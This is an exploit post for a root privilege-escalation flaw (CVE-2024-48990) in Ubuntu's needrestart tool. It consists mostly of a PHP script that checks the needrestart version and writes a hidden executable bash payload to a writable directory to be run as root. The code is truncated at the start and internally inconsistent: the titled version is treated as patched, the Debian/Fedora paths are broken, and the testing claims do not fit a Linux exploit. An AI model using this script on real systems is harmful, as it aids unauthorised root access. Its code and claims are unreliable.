============================================================================================================================================= | # Title : Needrestart 3.5-5ubuntu2.2 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://launchpad.net/ubuntu/+source/needrestart/3.5-5ubuntu2.2 | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: This code aims to exploit a vulnerability in the needrestart tool found in Ubuntu and Debian systems, which could allow an attacker to gain root privileges if the system is not updated. ( Related : https://packetstorm.news/files/id/183464/ Related CVE Numbers: CVE-2024-48990 ) [+] save code as poc.php. [+] Set Target : line 92 [+] USage : php poc.php [+] PayLoad : writableDir = $writableDir; $this->listenerTimeout = $listenerTimeout; } public function checkVulnerability() { $distro = $this->getDistro(); if (!in_array($distro, ['ubuntu', 'debian', 'fedora'])) { return "النظام ليس Ubuntu/Debian/Fedora، لا يمكن التحقق من الثغرة."; } if ($distro == 'ubuntu') { $version = $this->getUbuntuVersion(); if (!$version) return "تعذر تحديد إصدار أوبونتو."; $fixedVersions = [ '22.04' => '3.5-5ubuntu2.2', '20.04' => '3.4-6ubuntu0.1.esm1', '18.04' => '3.1-1ubuntu0.1.esm1' ]; if (!isset($fixedVersions[$version])) { return "إصدار أوبونتو $version غير معروف أو غير مختبر."; } } $needrestartVersion = $this->getNeedrestartVersion(); if (!$needrestartVersion) { return "لم يتم العثور على حزمة needrestart مثبتة."; } return version_compare($needrestartVersion, $fixedVersions[$version], '<') ? "النظام معرض للخطر، إصدار needrestart هو $needrestartVersion." : "إصدار needrestart آمن ($needrestartVersion)."; } private function getDistro() { return strtolower(trim(shell_exec("lsb_release -is"))); } private function getUbuntuVersion() { return trim(shell_exec("lsb_release -rs")); } private function getNeedrestartVersion() { $output = shell_exec("dpkg -l needrestart | grep '^ii'"); if (!$output) return null; $parts = preg_split('/\s+/', $output); return $parts[2] ?? null; } public function exploit() { if ($this->isRoot()) { return "الجلسة تمتلك صلاحيات الجذر بالفعل."; } if (!is_writable($this->writableDir)) { return "الدليل {$this->writableDir} غير قابل للكتابة."; } $payloadPath = $this->writableDir . '/.' . bin2hex(random_bytes(5)); file_put_contents($payloadPath, $this->generatePayload()); chmod($payloadPath, 0755); return "تم تحميل الحمولة التنفيذية إلى: $payloadPath. انتظر تشغيل needrestart..."; } private function isRoot() { return trim(shell_exec("id -u")) === '0'; } private function generatePayload() { return "#!/bin/bash\n" . "echo 'استغلال ناجح! المستخدم الحالي: ' \$(whoami) > /tmp/pwned.txt\n"; } } $exploit = new UbuntuNeedRestartExploit(); echo $exploit->checkVulnerability() . "\n"; echo $exploit->exploit() . "\n"; Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================